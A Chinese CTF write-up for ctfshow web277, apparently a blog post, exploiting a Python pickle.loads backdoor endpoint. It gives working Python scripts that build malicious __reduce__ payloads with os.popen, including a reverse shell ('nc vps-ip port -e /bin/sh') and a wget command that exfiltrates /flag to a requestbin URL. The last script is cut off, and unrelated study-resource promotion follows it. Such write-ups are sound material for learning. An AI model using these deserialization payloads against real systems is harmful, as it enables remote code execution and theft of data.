ctfshow python反序列化 刷题记录

	- [DNSlog](#DNSlog_165)

• web278

web277

进入靶场会看到where is flag?，Ctrl+U 检查源代码后可以看到注释的 html 标签

<!--/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m) -->

看到 pickle.loads 就知道是 python 反序列化没跑了。

先看给的提示：传入的 data 先进行 base64 解码后在进行反序列化，所以我们序列化完成之后还要额外进行 base64 编码

先简单的写一个爬虫脚本：

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'ls /'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

params 的作用是将请求中的参数添加到 URL 中，以便将这些参数传递给服务器。在这种情况下，params 是一个字典，包含了要作为查询字符串添加到 URL 中的参数。最终的 URL 将包含这些参数，以便服务器可以根据这些参数来处理请求。

无论是ls /还是cat /flag，回显都是 backdoor here：说明是一道 ”无回显“ 的题目。

有两种方法：反弹 shell 和 的 dns 外带

反弹 shell

只需将脚本稍微改一下：

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'nc vps-ip port -e /bin/sh'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

然后先再 vps 上开启对应端口的监听在运行脚本（否则会报错）

以1234端口为例：

nc -lvnp 1234

运行脚本后则会显示：

此时就可以输入 Linux 命令来读取 flag 啦

dns 外带

RequestBin

网址：RequestBin — Collect, inspect and debug HTTP requests and webhooks

先点击 Create a RequestBin 获取一个 url

同样只需将脚本稍微改一下：

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'wget http://requestbin.cn:80/1cpartx1?a=`cat /flag`'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

wget是一个在命令行下使用的下载工具，它可以从指定的URL下载文件。

运行脚本就能得到 flag

CEYE

网址：CEYE - Monitor service for security testing

可以稍微参考一下这篇文章：RCE绕过之无回显-CSDN博客，也可以在 http://ceye.io/payloads 中找相对应的 payload

在 http://ceye.io/profile 下的 Identifier 可以获取对应 url

同样只需将脚本稍微改一下：

import os
import pickle


现在能在网上找到很多很多的学习资源，有免费的也有收费的，当我拿到1套比较全的学习资源之前，我并没着急去看第1节，我而是去审视这套资源是否值得学习，有时候也会去问一些学长的意见，如果可以之后，我会对这套学习资源做1个学习计划，我的学习计划主要包括规划图和学习进度表。



分享给大家这份我薅到的免费视频资料，质量还不错，大家可以跟着学习

![](https://img-blog.csdnimg.cn/img_convert/21b2604bd33c4b6713f686ddd3fe5aff.png)



**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化学习资料的朋友，可以戳这里无偿获取](https://bbs.csdn.net/topics/618317507)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**